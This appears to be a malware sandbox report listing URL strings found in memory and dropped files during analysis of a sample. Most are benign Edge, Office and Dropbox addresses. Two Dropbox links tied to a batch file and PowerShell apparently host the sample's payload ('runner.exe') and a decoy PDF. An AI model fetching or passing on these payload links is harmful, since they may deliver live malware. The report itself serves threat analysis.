Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: HubApps Icons.6.dr, 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://experience.dropbox.com/
Source: svchost.exe, 00000004.00000003.1761645349.000001FA570C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1761645349.000001FA570C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://gaana.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1858829268.000002394FB5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394EC17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394FAD4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: msedge.exe, 00000003.00000002.1854271352.00001324024D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.dropbox.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.yahoo.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://m.kugou.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://m.soundcloud.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://m.vk.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: msedge.exe, 00000003.00000002.1854271352.00001324024D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000003.00000002.1854271352.00001324024D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://music.amazon.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://music.apple.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://music.yandex.com
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://navi.dropbox.jp/
Source: powershell.exe, 00000002.00000002.1907593267.000002395D893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msedge.exe, 00000003.00000002.1854271352.00001324024D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps-df.live.com
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://officeapps.live.com
Source: svchost.exe, 00000004.00000003.1761645349.000001FA570C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://onedrive.live.com/picker
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://open.spotify.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.live.com/mail/0/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.office.com/mail/0/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pal-test.adyen.com
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000003.00000003.1764216491.000013240246C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000003.00000003.1763368983.0000132402468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.dropbox.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sales.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://showcase.dropbox.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://tidal.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://twitter.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://vibe.naver.com/today
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://web.telegram.org/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://web.whatsapp.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://word.new?from=EdgeM365Shoreline
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.deezer.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.docsend.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394DA48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1858829268.000002394E00E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/page_success/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/pithos/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/playlist/
Source: powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp, FLKCAS1DzH.bat	String found in binary or memory: https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppu
Source: powershell.exe, 00000002.00000002.1858829268.000002394D821000.00000004.00000800.00020000.00000000.sdmp, FLKCAS1DzH.bat	String found in binary or memory: https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/service_worker.js
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/api/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/static/serviceworker/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: 873972660.exe.2.dr, 996293227.pdf.2.dr	String found in binary or memory: https://www.dropboxstatic.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropboxstatic.com/static/
Source: content.js.6.dr, content_new.js.6.dr	String found in binary or memory: https://www.google.com/chrome
Source: Web Data.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 00000002.00000002.1858829268.000002394DBDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hellosign.com/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.iheart.com/podcast/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.instagram.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.last.fm/
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.messenger.com
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.office.com
Source: Top Sites.6.dr	String found in binary or memory: https://www.office.com/
Source: Top Sites.6.dr	String found in binary or memory: https://www.office.com/Office
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
Source: 6276cb83-58a1-45e6-8dd6-8886964e76e1.tmp.6.dr	String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
